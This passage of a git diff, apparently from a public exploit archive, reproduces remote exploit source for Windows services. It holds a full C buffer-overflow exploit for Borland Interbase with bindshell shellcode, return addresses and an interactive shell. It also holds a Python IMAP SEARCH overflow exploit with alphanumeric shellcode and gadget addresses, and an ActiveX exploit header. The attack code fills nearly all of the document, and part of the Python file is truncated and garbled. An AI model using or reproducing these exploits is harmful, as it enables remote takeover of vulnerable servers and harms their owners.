-		return -1;
-	}
-
-	printf("Ok.\r\n");
-
-	// constructing the buffer
-	memset(buffer,0,16384);
-
-	memcpy(buffer,"\x00\x00\x00\x14\x00\x00\x00\x03",8);
-	size+=8;
-
-	dwLen1=htonl(targets[type].dwLength1+(sizeof(DWORD)*3));
-
-	memcpy(buffer+size,&dwLen1,sizeof(DWORD));
-	size+=sizeof(DWORD);
-
-	memset(buffer+size,0x90,targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE));
-	size+=targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE);
-
-	// shellcode
-	memcpy(buffer+size,shellcode,sizeof(shellcode));
-	size+=sizeof(shellcode);
-
-	// jump to shellcode (0xFFFFFFFF - (sizeof(shellcode)+BIG_JMP_SIZE)
-	dwBigJmp-=sizeof(shellcode)+BIG_JMP_SIZE;
-	// prepare jump code
-	memcpy(BIG_JMP+1,&dwBigJmp,sizeof(DWORD));
-	// write big jump code
-	memcpy(buffer+size,BIG_JMP,BIG_JMP_SIZE);
-	size+=BIG_JMP_SIZE;
-
-	// jmp 8 bytes back
-	memcpy(buffer+size,JMP,sizeof(DWORD));
-	size+=sizeof(DWORD);
-
-	// return addr
-	memcpy(buffer+size,&targets[type].dwRet,sizeof(DWORD));
-	size+=sizeof(DWORD);
-
-	memset(buffer+size,0xFF,sizeof(DWORD));
-	size+=sizeof(DWORD);
-
-	dwLen2=htonl(targets[type].dwLength2);
-
-	memcpy(buffer+size,&dwLen2,sizeof(DWORD));
-	size+=sizeof(DWORD);
-
-	memset(buffer+size,0x90,targets[type].dwLength2);
-	size+=targets[type].dwLength2;
-
-	printf("[+] Sending buffer (len: %u) ... ",size);
-
-	if (!send(s,buffer,size,0))
-	{
-		printf("Failed.\r\n");
-		closesocket(s);
-		WSACleanup();
-		return -1;
-	}
-
-	printf("Ok.\r\n");
-
-	closesocket(s);
-
-	Sleep(1000);
-
-	printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff,
-				(ulip>>16)&0xff,(ulip>>24)&0xff,bind);
-
-	s=socket(AF_INET, SOCK_STREAM,0);
-	if (s==INVALID_SOCKET)
-	{
-		printf("socket() error.\r\n",s);
-		WSACleanup();
-		return -1;
-	}
-
-	sock_in.sin_port=htons((u_short)bind);
-	sock_in.sin_family=AF_INET;
-	sock_in.sin_addr.s_addr=ulip;
-
-	if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR)
-	{
-		printf("Failed!\r\n");
-		closesocket(s);
-		WSACleanup();
-		return -1;
-	}
-
-	printf("Ok!\r\n\r\n--- w000t w000t ---\r\n\r\n");
-
-	shell(s);
-
-	closesocket(s);
-
-	WSACleanup();
-
-	return 0;
-}
-
-// milw0rm.com [2007-07-30]
+/*
+
+	http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064882.html
+
+	Groetjes aan mijn sletjes: Doopie, Sjaakhans, [PS] en Sleepwalker :P
+	All your base are belong to FD2K2!
+
+*/
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#pragma comment(lib,"ws2_32")
+
+#define IB_PORT "3050"
+// 0xFF - 0x8, jmp 8 bytes back
+#define JMP "\x90\x90\xEB\xF7"
+// 0xFFFFFFFF - (sizeof(shellcode) + BIG_JMP SIZE), jmp to beginning of shellcode
+CHAR BIG_JMP[]="\xE9\xFF\xFF\xFF\xFF";
+// BIG_JMP SIZE
+#define BIG_JMP_SIZE 5
+
+CHAR ASCII_SHIT[]=
+"\r\n                   >__            _      ___\r\n"
+"                  / __\\26/07/2007| | __ / __\\ ___  _ __   ___ \r\n"
+"                 /__\\/// _` |/ __| |/ //__\\/// _ \\| '_ \\ / _ \\\r\n"
+"                / \\/  \\ (_| | (__|   \r\n"
+"                     _______________BackBone_(c)_2007_______\r\n\r\n";
+
+struct
+{
+	char* cVersion;
+	DWORD dwRet;
+	DWORD dwLength1;
+	DWORD dwLength2;
+}
+targets[]=
+{
+	{"Interbase Server 2007 <=SP1 v8.0.0.123-w32 (UNIVERSAL)",0x403D4D,2108,0x2000}, // pop,pop,ret ibserver.exe v8.0.0.123
+	{"Interbase Server v7.5.0.129-w32 (UNIVERSAL)",0x403A5D,2108,0x2000}, // pop,pop,ret ibserver.exe v7.5.0.129
+	{"Interbase Server v7.1.0.181-w32 (UNIVERSAL)",0x4039BD,1336,0x2000}, // pop,pop,ret ibserver.exe v7.1.0.181
+	{"Interbase Server v6.0.1.6-w32 (UNIVERSAL) untested",0x403901,1336,0x2000}, // pop,pop,ret ibserver.exe v6.0.1.6
+ },v;
+
+// don't change the offset
+#define PORT_OFFSET 170
+#define BIND_PORT 10282
+
+// bindshell shellcode from www.metasploit.com,mod by skylined
+unsigned char shellcode[] =
+  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
+  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
+  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
+  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
+  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
+  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
+  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
+  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
+  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
+  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
+  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
+  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
+  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
+  "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
+  "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
+  "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
+  "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
+  "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
+  "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
+  "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
+  "\x83\xc4\x5c\x61\xeb\x89";
+
+#define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p);
+
+unsigned long lookupaddress(const char* pchost)
+{
+	unsigned long nremoteaddr = inet_addr(pchost);
+
+	if (nremoteaddr == INADDR_NONE)
+	{
+		struct hostent* phe = gethostbyname(pchost);
+
+		if (phe == 0)
+			return INADDR_NONE;
+		nremoteaddr = *((u_long*)phe->h_addr_list[0]);
+	}
+	return nremoteaddr;
+}
+
+void showusage(char* argv)
+{
+	int i;
+
+	printf("[*] Usage: %s ip[:port] target [bindport]\r\n", argv);
+	printf("[*] Standard port=%d, Standard bindport=%d.\r\n",atoi(IB_PORT),BIND_PORT);
+	printf("[*] Targets:\r\n\r\n");
+	for (i=0;i<(sizeof(targets)/sizeof(v));i++)
+		printf("\t%2d: %s\r\n",i,targets[i].cVersion);
+}
+
+void showinfo(void)
+{
+	printf("%s",ASCII_SHIT);
+	printf("    Borland Interbase ibserver.exe Create-Request Buffer Overflow Vulnerability\r\n");
+	printf("                       Advisory provided by TPTI-07-13.\r\n");
+	printf("                            Exploit by BackBone.\r\n\r\n");
+}
+
+/* ripped from TESO code and modifed by ey4s for win32 */
+void shell (int sock)
+{
+	int l;
+	char buf[512];
+	struct    timeval time;
+	unsigned long    ul[2];
+
+	time.tv_sec = 1;
+	time.tv_usec = 0;
+
+	while(1)
+	{
+		ul[0]=1;
+		ul[1]=sock;
+
+		l=select(0,(fd_set*)&ul,NULL,NULL,&time);
+		if(l==1)
+		{
+			l=recv(sock,buf,sizeof(buf),0);
+			if (l<=0)
+			{
+				printf("\r\n[-] connection closed.\n");
+				return;
+			}
+			l=write(1,buf,l);
+			if (l<=0)
+			{
+				printf("\r\n[-] connection closed.\n");
+				return;
+			}
+		}
+		else
+		    {
+			l=read(0,buf,sizeof(buf));
+			if (l<=0)
+			{
+				printf("\r\n[-] connection closed.\n");
+				return;
+			}
+			l=send(sock,buf,l,0);
+			if (l<=0)
+			{
+				printf("\r\n[-] connection closed.\n");
+				return;
+			}
+		}
+	}
+}
+
+int main(int argc, char *argv[])
+{
+	char *host,*port;
+	unsigned long ulip;
+	WSADATA wsa;
+	SOCKET s;
+	struct sockaddr_in sock_in;
+	char buffer[16384];
+	int bind,type;
+	unsigned int size=0;
+	DWORD dwLen1,dwLen2;
+	DWORD dwBigJmp=0xFFFFFFFF;
+	int i;
+
+	showinfo();
+
+	if (argc<3 || argc>4)
+	{
+		showusage(argv[0]);
+		return -1;
+	}
+
+	host=strtok(argv[1],":");
+	if((port=strtok(NULL,":"))==0)
+		port=IB_PORT;
+
+	if (WSAStartup(MAKEWORD(1,0),&wsa)!=0)
+	{
+		printf("[-] WSAStartup() error.\r\n");
+		return -1;
+	}
+
+	ulip=lookupaddress(host);
+	if (ulip==INADDR_ANY || ulip==INADDR_NONE)
+	{
+		printf("[-] invalid ip or host.\r\n");
+		return -1;
+	}
+
+	if (atoi(port)<0 || atoi(port)>65534)
+	{
+		printf("[-] invalid port.\r\n");
+		return -1;
+	}
+
+	type=atoi(argv[2]);
+	if (type>(sizeof(targets)/sizeof(v))-1 || type<0)
+	{
+		printf("[-] invalid target type.\r\n");
+		return -1;
+	}
+
+	printf("[+] Target: %s\r\n",targets[type].cVersion);
+
+	bind=BIND_PORT;
+	if (argc==4)
+	{
+		if (atoi(argv[3])>0 && atoi(argv[3])<65535)
+			bind=atoi(argv[3]);
+	}
+	SET_BIND_PORT(bind);
+
+	s=socket(AF_INET, SOCK_STREAM,0);
+	if (s==INVALID_SOCKET)
+	{
+		printf("[-] socket() error.\r\n",s);
+		return -1;
+	}
+
+	sock_in.sin_port=htons((u_short)atoi(port));
+	sock_in.sin_family=AF_INET;
+	sock_in.sin_addr.s_addr=ulip;
+
+	printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff,
+		(ulip>>16)&0xff,(ulip>>24)&0xff,atoi(port));
+
+	if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR)
+	{
+		printf("Failed!\r\n");
+		closesocket(s);
+		WSACleanup();
+		return -1;
+	}
+
+	printf("Ok.\r\n");
+
+	// constructing the buffer
+	memset(buffer,0,16384);
+
+	memcpy(buffer,"\x00\x00\x00\x14\x00\x00\x00\x03",8);
+	size+=8;
+
+	dwLen1=htonl(targets[type].dwLength1+(sizeof(DWORD)*3));
+
+	memcpy(buffer+size,&dwLen1,sizeof(DWORD));
+	size+=sizeof(DWORD);
+
+	memset(buffer+size,0x90,targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE));
+	size+=targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE);
+
+	// shellcode
+	memcpy(buffer+size,shellcode,sizeof(shellcode));
+	size+=sizeof(shellcode);
+
+	// jump to shellcode (0xFFFFFFFF - (sizeof(shellcode)+BIG_JMP_SIZE)
+	dwBigJmp-=sizeof(shellcode)+BIG_JMP_SIZE;
+	// prepare jump code
+	memcpy(BIG_JMP+1,&dwBigJmp,sizeof(DWORD));
+	// write big jump code
+	memcpy(buffer+size,BIG_JMP,BIG_JMP_SIZE);
+	size+=BIG_JMP_SIZE;
+
+	// jmp 8 bytes back
+	memcpy(buffer+size,JMP,sizeof(DWORD));
+	size+=sizeof(DWORD);
+
+	// return addr
+	memcpy(buffer+size,&targets[type].dwRet,sizeof(DWORD));
+	size+=sizeof(DWORD);
+
+	memset(buffer+size,0xFF,sizeof(DWORD));
+	size+=sizeof(DWORD);
+
+	dwLen2=htonl(targets[type].dwLength2);
+
+	memcpy(buffer+size,&dwLen2,sizeof(DWORD));
+	size+=sizeof(DWORD);
+
+	memset(buffer+size,0x90,targets[type].dwLength2);
+	size+=targets[type].dwLength2;
+
+	printf("[+] Sending buffer (len: %u) ... ",size);
+
+	if (!send(s,buffer,size,0))
+	{
+		printf("Failed.\r\n");
+		closesocket(s);
+		WSACleanup();
+		return -1;
+	}
+
+	printf("Ok.\r\n");
+
+	closesocket(s);
+
+	Sleep(1000);
+
+	printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff,
+				(ulip>>16)&0xff,(ulip>>24)&0xff,bind);
+
+	s=socket(AF_INET, SOCK_STREAM,0);
+	if (s==INVALID_SOCKET)
+	{
+		printf("socket() error.\r\n",s);
+		WSACleanup();
+		return -1;
+	}
+
+	sock_in.sin_port=htons((u_short)bind);
+	sock_in.sin_family=AF_INET;
+	sock_in.sin_addr.s_addr=ulip;
+
+	if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR)
+	{
+		printf("Failed!\r\n");
+		closesocket(s);
+		WSACleanup();
+		return -1;
+	}
+
+	printf("Ok!\r\n\r\n--- w000t w000t ---\r\n\r\n");
+
+	shell(s);
+
+	closesocket(s);
+
+	WSACleanup();
+
+	return 0;
+}
+
+// milw0rm.com [2007-07-30]
diff --git a/platforms/windows/remote/4255.html b/platforms/windows/remote/4255.html
index 1f9bebfde..fc856316d 100755
--- a/platforms/windows/remote/4255.html
+++ b/platforms/windows/remote/4255.html
@@ -1,48 +1,48 @@
-
    ------------------------------------------------------------------------------
- CHILKAT ASP String (CkString.dll <= 1.1) "SaveToFile()" Inscure Method
- url: http://www.chilkatsoft.com/
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not be responsible for any damage.
- 
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
- all software that use this ocx are vulnerable to this exploits.
-
- This control is marked as:
- RegKey Safe for Script: False
- RegKey Safe for Init: False
- Implements IObjectSafety: True
- IDisp Safe: Safe for untrusted: caller, data
- IPersist Safe: Safe for untrusted: caller, data
- IPStorage Safe: Safe for untrusted: caller, data
------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-08-05]
+
    +-----------------------------------------------------------------------------
+ CHILKAT ASP String (CkString.dll <= 1.1) "SaveToFile()" Inscure Method
+ url: http://www.chilkatsoft.com/
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not be responsible for any damage.
+ 
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ all software that use this ocx are vulnerable to this exploits.
+
+ This control is marked as:
+ RegKey Safe for Script: False
+ RegKey Safe for Init: False
+ Implements IObjectSafety: True
+ IDisp Safe: Safe for untrusted: caller, data
+ IPersist Safe: Safe for untrusted: caller, data
+ IPStorage Safe: Safe for untrusted: caller, data
+-----------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-08-05]
diff --git a/platforms/windows/remote/4259.txt b/platforms/windows/remote/4259.txt
index fc2300952..3f9beafd4 100755
--- a/platforms/windows/remote/4259.txt
+++ b/platforms/windows/remote/4259.txt
@@ -1,53 +1,53 @@
-
-
- 
-  
-
-
-# milw0rm.com [2007-08-06]
+
+
+ 
+  
+
+
+# milw0rm.com [2007-08-06]
diff --git a/platforms/windows/remote/426.c b/platforms/windows/remote/426.c
index 6c547cb6a..0de419328 100755
--- a/platforms/windows/remote/426.c
+++ b/platforms/windows/remote/426.c
@@ -240,6 +240,6 @@ void loginftp(SOCKET sockfd, char *user, char *pass)
     checkstatus(recvbuf);
     printf("[+] User %s logged in.\r\n", user);
 }
-
-
-// milw0rm.com [2004-08-31]
+
+
+// milw0rm.com [2004-08-31]
diff --git a/platforms/windows/remote/4279.html b/platforms/windows/remote/4279.html
index cee355162..f9a97b02c 100755
--- a/platforms/windows/remote/4279.html
+++ b/platforms/windows/remote/4279.html
@@ -1,53 +1,53 @@
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-08-10]
+
+
+
+
+
+
+
+
+# milw0rm.com [2007-08-10]
diff --git a/platforms/windows/remote/4287.py b/platforms/windows/remote/4287.py
index fef593361..8ffc665d5 100755
--- a/platforms/windows/remote/4287.py
+++ b/platforms/windows/remote/4287.py
@@ -1,113 +1,113 @@
-#!/usr/bin/python
-
-import os
-import sys
-import time
-import socket
-import struct
-
-#this is imap exploit
-
-#710 bytes, tcp port 9999 bind, borrowed from skape miller inventor of megacanvas
-sc  = "\x90"
-sc += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xeb\x03\x59"
-sc += "\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\x49\x49\x49"
-sc += "\x49\x49\x49\x49\x49\x49\x49\x49\x51\x37\x5a\x6a\x66\x58\x50\x30"
-sc += "\x41\x31\x42\x41\x6b\x41\x41\x76\x41\x32\x41\x41\x32\x42\x41\x30"
-sc += "\x42\x41\x58\x50\x38\x41\x42\x75\x79\x79\x4b\x4c\x32\x4a\x7a\x4b"
-sc += "\x42\x6d\x78\x68\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f\x75\x30\x6e\x6b"
-sc += "\x42\x4c\x45\x74\x71\x34\x6c\x4b\x41\x55\x57\x4c\x4e\x6b\x33\x4c"
-sc += "\x53\x35\x51\x68\x55\x51\x68\x6f\x4c\x4b\x72\x6f\x56\x78\x6e\x6b"
-sc += "\x61\x4f\x77\x50\x76\x61\x38\x6b\x52\x69\x4e\x6b\x36\x54\x4e\x6b"
-sc += "\x67\x71\x4a\x4e\x76\x51\x4f\x30\x6d\x49\x4e\x4c\x4d\x54\x4b\x70"
-sc += "\x41\x64\x43\x37\x4b\x71\x6b\x7a\x76\x6d\x54\x41\x4f\x32\x7a\x4b"
-sc += "\x6a\x54\x45\x6b\x33\x64\x56\x44\x77\x58\x34\x35\x6b\x55\x4c\x4b"
-sc += "\x61\x4f\x46\x44\x55\x51\x58\x6b\x31\x76\x6c\x4b\x46\x6c\x30\x4b"
-sc += "\x4e\x6b\x61\x4f\x75\x4c\x64\x41\x38\x6b\x53\x33\x54\x6c\x4c\x4b"
-sc += "\x6d\x59\x50\x6c\x64\x64\x55\x4c\x30\x61\x6b\x73\x74\x71\x4b\x6b"
-sc += "\x51\x74\x4c\x4b\x51\x53\x70\x30\x4c\x4b\x77\x30\x36\x6c\x4c\x4b"
-sc += "\x72\x50\x35\x4c\x4e\x4d\x6c\x4b\x73\x70\x57\x78\x31\x4e\x42\x48"
-sc += "\x4e\x6e\x50\x4e\x76\x6e\x5a\x4c\x30\x50\x6b\x4f\x49\x46\x75\x36"
-sc += "\x56\x33\x53\x56\x75\x38\x37\x43\x34\x72\x35\x38\x74\x37\x54\x33"
-sc += "\x44\x72\x63\x6f\x71\x44\x4b\x4f\x7a\x70\x42\x48\x38\x4b\x38\x6d"
-sc += "\x6b\x4c\x47\x4b\x30\x50\x4b\x4f\x4e\x36\x51\x4f\x4f\x79\x4d\x35"
-sc += "\x42\x46\x4b\x31\x7a\x4d\x33\x38\x57\x72\x76\x35\x61\x7a\x46\x62"
-sc += "\x4b\x4f\x6e\x30\x51\x78\x4b\x69\x67\x79\x59\x65\x6c\x6d\x41\x47"
-sc += "\x4b\x4f\x6e\x36\x41\x43\x56\x33\x76\x33\x52\x73\x70\x53\x51\x53"
-sc += "\x70\x53\x32\x63\x32\x73\x6b\x4f\x4e\x30\x41\x76\x62\x48\x36\x47"
-sc += "\x54\x4f\x41\x76\x72\x73\x4f\x79\x49\x71\x4e\x75\x31\x78\x6e\x44"
-sc += "\x67\x6a\x64\x30\x4f\x37\x70\x57\x69\x6f\x6e\x36\x70\x6a\x74\x50"
-sc += "\x62\x71\x73\x65\x4b\x4f\x38\x50\x62\x48\x4c\x64\x4e\x4d\x64\x6e"
-sc += "\x58\x69\x62\x77\x4b\x4f\x7a\x76\x50\x53\x51\x45\x39\x6f\x58\x50"
-sc += "\x71\x78\x6b\x55\x53\x79\x6f\x76\x53\x79\x36\x37\x39\x6f\x79\x46"
-sc += "\x72\x70\x61\x44\x33\x64\x62\x75\x59\x6f\x48\x50\x4a\x33\x51\x78"
-sc += "\x6d\x37\x71\x69\x79\x56\x71\x69\x70\x57\x6b\x4f\x6e\x36\x51\x45"
-sc += "\x69\x6f\x6e\x30\x45\x36\x63\x5a\x41\x74\x35\x36\x72\x48\x30\x63"
-sc += "\x50\x6d\x6f\x79\x59\x75\x63\x5a\x52\x70\x43\x69\x37\x59\x58\x4c"
-sc += "\x4f\x79\x79\x77\x52\x4a\x33\x74\x4d\x59\x39\x72\x55\x61\x4f\x30"
-sc += "\x7a\x53\x6d\x7a\x79\x6e\x47\x32\x76\x4d\x69\x6e\x47\x32\x34\x6c"
-sc += "\x6d\x43\x6c\x4d\x72\x5a\x54\x78\x4e\x4b\x4c\x6b\x6c\x6b\x75\x38"
-sc += "\x52\x52\x4b\x4e\x4e\x53\x55\x46\x79\x6f\x71\x65\x41\x54\x59\x6f"
-sc += "\x4e\x36\x43\x6b\x71\x47\x51\x42\x52\x71\x62\x71\x52\x71\x51\x7a"
-sc += "\x33\x31\x56\x31\x46\x31\x51\x45\x50\x51\x59\x6f\x4e\x30\x50\x68"
-sc += "\x4c\x6d\x6e\x39\x53\x35\x6a\x6e\x62\x73\x49\x6f\x5a\x76\x50\x6a"
-sc += "\x59\x6f\x4b\x4f\x34\x77\x59\x6f\x5a\x70\x6c\x4b\x32\x77\x39\x6c"
-sc += "\x6c\x43\x4b\x74\x61\x74\x6b\x4f\x6a\x76\x50\x52\x79\x6f\x6e\x30"
-sc += "\x42\x48\x7a\x4f\x6a\x6e\x59\x70\x63\x50\x42\x73\x4b\x4f\x48\x56"
-sc += "\x79\x6f\x4e\x30\x66"
-
-
-def Copulate(target,port):
-        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-        s.connect((target,port))
-	return s
-
-def Fascism(target,u,p):
-	safe_readable_null = 0x71c010e4 # Safe readable, preferably null (ws2_32 on win2k3)
-	safe_writable = 0x0fff7004 # Safe writable (rsaenh.dll data section on win2k3)
-	pop_then_ret = 0x77e41a26 # EIP (pop, ret in kernel32 on win2k3)
-	call_esp = 0x77e839b3 # Return #2, call esp in kernel32. When hit, esp points at the next 4 bytes.
-	s = Copulate(target,143)
-	pkt = "0001 LOGIN \""
-	pkt += u
-	pkt += "\" \""
-	pkt += p
-	pkt += "\"\r\n"
-	SendPacket(s,pkt)
-	pkt = "0003 SELECT \"Inbox\"\r\n"
-	SendPacket(s,pkt)
-	pkt = "C284 SEARCH "
-	pkt += "P"*1008
-	pkt += struct.pack('  ' % sys.argv[0]
-                sys.exit(-1)
-        Fascism(target,u,p)
-
-# milw0rm.com [2007-08-14]
+#!/usr/bin/python
+
+import os
+import sys
+import time
+import socket
+import struct
+
+#this is imap exploit
+
+#710 bytes, tcp port 9999 bind, borrowed from skape miller inventor of megacanvas
+sc  = "\x90"
+sc += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xeb\x03\x59"
+sc += "\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+sc += "\x49\x49\x49\x49\x49\x49\x49\x49\x51\x37\x5a\x6a\x66\x58\x50\x30"
+sc += "\x41\x31\x42\x41\x6b\x41\x41\x76\x41\x32\x41\x41\x32\x42\x41\x30"
+sc += "\x42\x41\x58\x50\x38\x41\x42\x75\x79\x79\x4b\x4c\x32\x4a\x7a\x4b"
+sc += "\x42\x6d\x78\x68\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f\x75\x30\x6e\x6b"
+sc += "\x42\x4c\x45\x74\x71\x34\x6c\x4b\x41\x55\x57\x4c\x4e\x6b\x33\x4c"
+sc += "\x53\x35\x51\x68\x55\x51\x68\x6f\x4c\x4b\x72\x6f\x56\x78\x6e\x6b"
+sc += "\x61\x4f\x77\x50\x76\x61\x38\x6b\x52\x69\x4e\x6b\x36\x54\x4e\x6b"
+sc += "\x67\x71\x4a\x4e\x76\x51\x4f\x30\x6d\x49\x4e\x4c\x4d\x54\x4b\x70"
+sc += "\x41\x64\x43\x37\x4b\x71\x6b\x7a\x76\x6d\x54\x41\x4f\x32\x7a\x4b"
+sc += "\x6a\x54\x45\x6b\x33\x64\x56\x44\x77\x58\x34\x35\x6b\x55\x4c\x4b"
+sc += "\x61\x4f\x46\x44\x55\x51\x58\x6b\x31\x76\x6c\x4b\x46\x6c\x30\x4b"
+sc += "\x4e\x6b\x61\x4f\x75\x4c\x64\x41\x38\x6b\x53\x33\x54\x6c\x4c\x4b"
+sc += "\x6d\x59\x50\x6c\x64\x64\x55\x4c\x30\x61\x6b\x73\x74\x71\x4b\x6b"
+sc += "\x51\x74\x4c\x4b\x51\x53\x70\x30\x4c\x4b\x77\x30\x36\x6c\x4c\x4b"
+sc += "\x72\x50\x35\x4c\x4e\x4d\x6c\x4b\x73\x70\x57\x78\x31\x4e\x42\x48"
+sc += "\x4e\x6e\x50\x4e\x76\x6e\x5a\x4c\x30\x50\x6b\x4f\x49\x46\x75\x36"
+sc += "\x56\x33\x53\x56\x75\x38\x37\x43\x34\x72\x35\x38\x74\x37\x54\x33"
+sc += "\x44\x72\x63\x6f\x71\x44\x4b\x4f\x7a\x70\x42\x48\x38\x4b\x38\x6d"
+sc += "\x6b\x4c\x47\x4b\x30\x50\x4b\x4f\x4e\x36\x51\x4f\x4f\x79\x4d\x35"
+sc += "\x42\x46\x4b\x31\x7a\x4d\x33\x38\x57\x72\x76\x35\x61\x7a\x46\x62"
+sc += "\x4b\x4f\x6e\x30\x51\x78\x4b\x69\x67\x79\x59\x65\x6c\x6d\x41\x47"
+sc += "\x4b\x4f\x6e\x36\x41\x43\x56\x33\x76\x33\x52\x73\x70\x53\x51\x53"
+sc += "\x70\x53\x32\x63\x32\x73\x6b\x4f\x4e\x30\x41\x76\x62\x48\x36\x47"
+sc += "\x54\x4f\x41\x76\x72\x73\x4f\x79\x49\x71\x4e\x75\x31\x78\x6e\x44"
+sc += "\x67\x6a\x64\x30\x4f\x37\x70\x57\x69\x6f\x6e\x36\x70\x6a\x74\x50"
+sc += "\x62\x71\x73\x65\x4b\x4f\x38\x50\x62\x48\x4c\x64\x4e\x4d\x64\x6e"
+sc += "\x58\x69\x62\x77\x4b\x4f\x7a\x76\x50\x53\x51\x45\x39\x6f\x58\x50"
+sc += "\x71\x78\x6b\x55\x53\x79\x6f\x76\x53\x79\x36\x37\x39\x6f\x79\x46"
+sc += "\x72\x70\x61\x44\x33\x64\x62\x75\x59\x6f\x48\x50\x4a\x33\x51\x78"
+sc += "\x6d\x37\x71\x69\x79\x56\x71\x69\x70\x57\x6b\x4f\x6e\x36\x51\x45"
+sc += "\x69\x6f\x6e\x30\x45\x36\x63\x5a\x41\x74\x35\x36\x72\x48\x30\x63"
+sc += "\x50\x6d\x6f\x79\x59\x75\x63\x5a\x52\x70\x43\x69\x37\x59\x58\x4c"
+sc += "\x4f\x79\x79\x77\x52\x4a\x33\x74\x4d\x59\x39\x72\x55\x61\x4f\x30"
+sc += "\x7a\x53\x6d\x7a\x79\x6e\x47\x32\x76\x4d\x69\x6e\x47\x32\x34\x6c"
+sc += "\x6d\x43\x6c\x4d\x72\x5a\x54\x78\x4e\x4b\x4c\x6b\x6c\x6b\x75\x38"
+sc += "\x52\x52\x4b\x4e\x4e\x53\x55\x46\x79\x6f\x71\x65\x41\x54\x59\x6f"
+sc += "\x4e\x36\x43\x6b\x71\x47\x51\x42\x52\x71\x62\x71\x52\x71\x51\x7a"
+sc += "\x33\x31\x56\x31\x46\x31\x51\x45\x50\x51\x59\x6f\x4e\x30\x50\x68"
+sc += "\x4c\x6d\x6e\x39\x53\x35\x6a\x6e\x62\x73\x49\x6f\x5a\x76\x50\x6a"
+sc += "\x59\x6f\x4b\x4f\x34\x77\x59\x6f\x5a\x70\x6c\x4b\x32\x77\x39\x6c"
+sc += "\x6c\x43\x4b\x74\x61\x74\x6b\x4f\x6a\x76\x50\x52\x79\x6f\x6e\x30"
+sc += "\x42\x48\x7a\x4f\x6a\x6e\x59\x70\x63\x50\x42\x73\x4b\x4f\x48\x56"
+sc += "\x79\x6f\x4e\x30\x66"
+
+
+def Copulate(target,port):
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.connect((target,port))
+	return s
+
+def Fascism(target,u,p):
+	safe_readable_null = 0x71c010e4 # Safe readable, preferably null (ws2_32 on win2k3)
+	safe_writable = 0x0fff7004 # Safe writable (rsaenh.dll data section on win2k3)
+	pop_then_ret = 0x77e41a26 # EIP (pop, ret in kernel32 on win2k3)
+	call_esp = 0x77e839b3 # Return #2, call esp in kernel32. When hit, esp points at the next 4 bytes.
